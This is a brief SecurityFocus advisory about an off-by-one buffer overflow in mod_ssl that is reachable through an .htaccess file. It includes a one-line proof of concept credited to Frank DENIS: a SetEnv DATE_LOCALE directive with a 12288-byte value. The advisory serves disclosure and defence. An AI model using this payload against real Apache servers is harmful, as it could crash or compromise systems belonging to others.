Mod_SSL Off-By-One HTAccess Buffer Overflow Vulnerability

The following proof of concept was made available by Frank DENIS <j@42-Networks.Com>.

In a regular .htaccess file:

SetEnv DATE_LOCALE "X"

where the character X represents a string of 12288 bytes.


 

Privacy Statement
Copyright 2010, SecurityFocus